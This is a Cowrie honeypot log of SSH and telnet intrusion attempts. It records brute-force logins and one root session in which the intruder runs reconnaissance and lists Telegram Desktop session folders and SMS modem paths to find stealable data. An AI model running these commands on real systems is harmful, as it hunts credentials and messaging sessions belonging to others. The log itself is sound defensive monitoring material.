{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:46:17.935263Z","src_ip":"212.227.125.160","session":"91f24766b010"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":42422,"dst_ip":"1.2.3.4","dst_port":23,"session":"dacfefe46860","protocol":"telnet","message":"New connection: 115.63.50.75:42422 (1.2.3.4:23) [session: dacfefe46860]","sensor":"my-vps","timestamp":"2025-08-28T14:47:22.887027Z"}
{"eventid":"cowrie.session.closed","duration":12.643874168395996,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:47:35.530827Z","src_ip":"115.63.50.75","session":"dacfefe46860"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":42731,"dst_ip":"1.2.3.4","dst_port":23,"session":"3353ddc0fc7a","protocol":"telnet","message":"New connection: 115.63.50.75:42731 (1.2.3.4:23) [session: 3353ddc0fc7a]","sensor":"my-vps","timestamp":"2025-08-28T14:47:35.812440Z"}
{"eventid":"cowrie.session.closed","duration":12.77077865600586,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:47:48.583146Z","src_ip":"115.63.50.75","session":"3353ddc0fc7a"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":43048,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b99efa89247","protocol":"telnet","message":"New connection: 115.63.50.75:43048 (1.2.3.4:23) [session: 3b99efa89247]","sensor":"my-vps","timestamp":"2025-08-28T14:47:48.684806Z"}
{"eventid":"cowrie.session.closed","duration":12.847272157669067,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:48:01.532014Z","src_ip":"115.63.50.75","session":"3b99efa89247"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":43367,"dst_ip":"1.2.3.4","dst_port":23,"session":"60fd09d4f333","protocol":"telnet","message":"New connection: 115.63.50.75:43367 (1.2.3.4:23) [session: 60fd09d4f333]","sensor":"my-vps","timestamp":"2025-08-28T14:48:01.715735Z"}
{"eventid":"cowrie.session.closed","duration":12.814241409301758,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:48:14.529902Z","src_ip":"115.63.50.75","session":"60fd09d4f333"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":43693,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c4869a184d6","protocol":"telnet","message":"New connection: 115.63.50.75:43693 (1.2.3.4:23) [session: 5c4869a184d6]","sensor":"my-vps","timestamp":"2025-08-28T14:48:14.736068Z"}
{"eventid":"cowrie.session.closed","duration":12.794368982315063,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:48:27.530352Z","src_ip":"115.63.50.75","session":"5c4869a184d6"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":44019,"dst_ip":"1.2.3.4","dst_port":23,"session":"b36fca1964c4","protocol":"telnet","message":"New connection: 115.63.50.75:44019 (1.2.3.4:23) [session: b36fca1964c4]","sensor":"my-vps","timestamp":"2025-08-28T14:48:27.704766Z"}
{"eventid":"cowrie.session.closed","duration":12.8157217502594,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:48:40.520420Z","src_ip":"115.63.50.75","session":"b36fca1964c4"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":44342,"dst_ip":"1.2.3.4","dst_port":23,"session":"e0e14f9c1d3b","protocol":"telnet","message":"New connection: 115.63.50.75:44342 (1.2.3.4:23) [session: e0e14f9c1d3b]","sensor":"my-vps","timestamp":"2025-08-28T14:48:40.700872Z"}
{"eventid":"cowrie.session.closed","duration":12.85274624824524,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:48:53.553539Z","src_ip":"115.63.50.75","session":"e0e14f9c1d3b"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":44664,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6d05dbd8456","protocol":"telnet","message":"New connection: 115.63.50.75:44664 (1.2.3.4:23) [session: b6d05dbd8456]","sensor":"my-vps","timestamp":"2025-08-28T14:48:53.738972Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43910,"dst_ip":"1.2.3.4","dst_port":22,"session":"d91395b9ca95","protocol":"ssh","message":"New connection: 212.227.125.160:43910 (1.2.3.4:22) [session: d91395b9ca95]","sensor":"my-vps","timestamp":"2025-08-28T14:49:04.848252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T14:49:04.849470Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-28T14:49:05.203147Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.closed","duration":12.80593490600586,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:06.544840Z","src_ip":"115.63.50.75","session":"b6d05dbd8456"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":44988,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbe275989e71","protocol":"telnet","message":"New connection: 115.63.50.75:44988 (1.2.3.4:23) [session: bbe275989e71]","sensor":"my-vps","timestamp":"2025-08-28T14:49:06.731357Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T14:49:06.802739Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:49:08.158877Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:08.889343Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T14:49:08.890138Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T14:49:08.890983Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.245085Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52130,"dst_ip":"1.2.3.4","dst_port":22,"session":"936d32368de7","protocol":"ssh","message":"New connection: 212.227.235.229:52130 (1.2.3.4:22) [session: 936d32368de7]","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.454989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.455849Z","src_ip":"212.227.235.229","session":"936d32368de7"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.559583Z","src_ip":"212.227.235.229","session":"936d32368de7"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a0:d9:d5:0d:4f:59:5c:73:5e:15:37:7b:9d:f5:da:17","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChLlHB5pKKY2dAYXuLj/fNvH3Hql/4ksGRp49bwsW8sslo3NOk70bWUn89DyKCv7FMcFcVMIcAijwyz3eWKXhRDcXvUENS9Vs0gLs3HRl6+VEZZQ5dEHhaJuxnJUiWh4QRPrZIrbVcjW/tEuFGml8Z4/jpdrZauuu+/+iGkvcSZG3yJTjyE9fWcFAMFkjQwZ/0JjwD+PHhq9IofqL0SDgxzi4YTU8S8jPdhBie59Om/WGpvb/lUyHv5ILV0HyMAONHD4N3S9kJoMu68o2Zd19DN0cEYMrokTiIepktEZPvoyOmigfE058dtUHbrdnYQ74552AVzGmaKoRZTptp4sosrptYVqLM3eXeGBR2iGR+F+2x7FyQdrnQ6eHtoTMJI38+sZJLk2ci7FYI+7UujZcCP6y9IsCr+3KacXjW6GJN9w+IYv4FD2i8vi3lAUTI0ZTJmti7+8NxxnpAbNJ9dJxOPsXG6UfLezAnu4cdydT7FxJ2J55kc/mTwC4vajIb+z0=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a0:d9:d5:0d:4f:59:5c:73:5e:15:37:7b:9d:f5:da:17","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.769032Z","src_ip":"212.227.235.229","session":"936d32368de7"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a0:d9:d5:0d:4f:59:5c:73:5e:15:37:7b:9d:f5:da:17","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChLlHB5pKKY2dAYXuLj/fNvH3Hql/4ksGRp49bwsW8sslo3NOk70bWUn89DyKCv7FMcFcVMIcAijwyz3eWKXhRDcXvUENS9Vs0gLs3HRl6+VEZZQ5dEHhaJuxnJUiWh4QRPrZIrbVcjW/tEuFGml8Z4/jpdrZauuu+/+iGkvcSZG3yJTjyE9fWcFAMFkjQwZ/0JjwD+PHhq9IofqL0SDgxzi4YTU8S8jPdhBie59Om/WGpvb/lUyHv5ILV0HyMAONHD4N3S9kJoMu68o2Zd19DN0cEYMrokTiIepktEZPvoyOmigfE058dtUHbrdnYQ74552AVzGmaKoRZTptp4sosrptYVqLM3eXeGBR2iGR+F+2x7FyQdrnQ6eHtoTMJI38+sZJLk2ci7FYI+7UujZcCP6y9IsCr+3KacXjW6GJN9w+IYv4FD2i8vi3lAUTI0ZTJmti7+8NxxnpAbNJ9dJxOPsXG6UfLezAnu4cdydT7FxJ2J55kc/mTwC4vajIb+z0=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.769852Z","src_ip":"212.227.235.229","session":"936d32368de7"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a0:d9:d5:0d:4f:59:5c:73:5e:15:37:7b:9d:f5:da:17","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChLlHB5pKKY2dAYXuLj/fNvH3Hql/4ksGRp49bwsW8sslo3NOk70bWUn89DyKCv7FMcFcVMIcAijwyz3eWKXhRDcXvUENS9Vs0gLs3HRl6+VEZZQ5dEHhaJuxnJUiWh4QRPrZIrbVcjW/tEuFGml8Z4/jpdrZauuu+/+iGkvcSZG3yJTjyE9fWcFAMFkjQwZ/0JjwD+PHhq9IofqL0SDgxzi4YTU8S8jPdhBie59Om/WGpvb/lUyHv5ILV0HyMAONHD4N3S9kJoMu68o2Zd19DN0cEYMrokTiIepktEZPvoyOmigfE058dtUHbrdnYQ74552AVzGmaKoRZTptp4sosrptYVqLM3eXeGBR2iGR+F+2x7FyQdrnQ6eHtoTMJI38+sZJLk2ci7FYI+7UujZcCP6y9IsCr+3KacXjW6GJN9w+IYv4FD2i8vi3lAUTI0ZTJmti7+8NxxnpAbNJ9dJxOPsXG6UfLezAnu4cdydT7FxJ2J55kc/mTwC4vajIb+z0=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a0:d9:d5:0d:4f:59:5c:73:5e:15:37:7b:9d:f5:da:17","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.875406Z","src_ip":"212.227.235.229","session":"936d32368de7"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a0:d9:d5:0d:4f:59:5c:73:5e:15:37:7b:9d:f5:da:17","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChLlHB5pKKY2dAYXuLj/fNvH3Hql/4ksGRp49bwsW8sslo3NOk70bWUn89DyKCv7FMcFcVMIcAijwyz3eWKXhRDcXvUENS9Vs0gLs3HRl6+VEZZQ5dEHhaJuxnJUiWh4QRPrZIrbVcjW/tEuFGml8Z4/jpdrZauuu+/+iGkvcSZG3yJTjyE9fWcFAMFkjQwZ/0JjwD+PHhq9IofqL0SDgxzi4YTU8S8jPdhBie59Om/WGpvb/lUyHv5ILV0HyMAONHD4N3S9kJoMu68o2Zd19DN0cEYMrokTiIepktEZPvoyOmigfE058dtUHbrdnYQ74552AVzGmaKoRZTptp4sosrptYVqLM3eXeGBR2iGR+F+2x7FyQdrnQ6eHtoTMJI38+sZJLk2ci7FYI+7UujZcCP6y9IsCr+3KacXjW6GJN9w+IYv4FD2i8vi3lAUTI0ZTJmti7+8NxxnpAbNJ9dJxOPsXG6UfLezAnu4cdydT7FxJ2J55kc/mTwC4vajIb+z0=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T14:49:09.876256Z","src_ip":"212.227.235.229","session":"936d32368de7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:10.018198Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-28T14:49:10.019101Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:10.374211Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:11.137068Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T14:49:11.137975Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:11.502919Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:12.662280Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-28T14:49:12.662958Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:13.021518Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:13.746266Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T14:49:13.747016Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36110,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5ef01594882","protocol":"ssh","message":"New connection: 212.227.235.229:36110 (1.2.3.4:22) [session: a5ef01594882]","sensor":"my-vps","timestamp":"2025-08-28T14:49:13.972529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:49:13.973466Z","src_ip":"212.227.235.229","session":"a5ef01594882"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:14.101960Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:49:14.159067Z","src_ip":"212.227.235.229","session":"a5ef01594882"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:14.873541Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T14:49:14.874218Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.login.failed","username":"sfserver","password":"sfserver","message":"login attempt [sfserver/sfserver] failed","sensor":"my-vps","timestamp":"2025-08-28T14:49:14.945700Z","src_ip":"212.227.235.229","session":"a5ef01594882"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:15.228409Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:16.004281Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-28T14:49:16.004953Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:16.133447Z","src_ip":"212.227.235.229","session":"a5ef01594882"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:16.365699Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:17.131649Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-28T14:49:17.132579Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:17.536590Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:49:18.265417Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-28T14:49:18.266079Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:18.620909Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
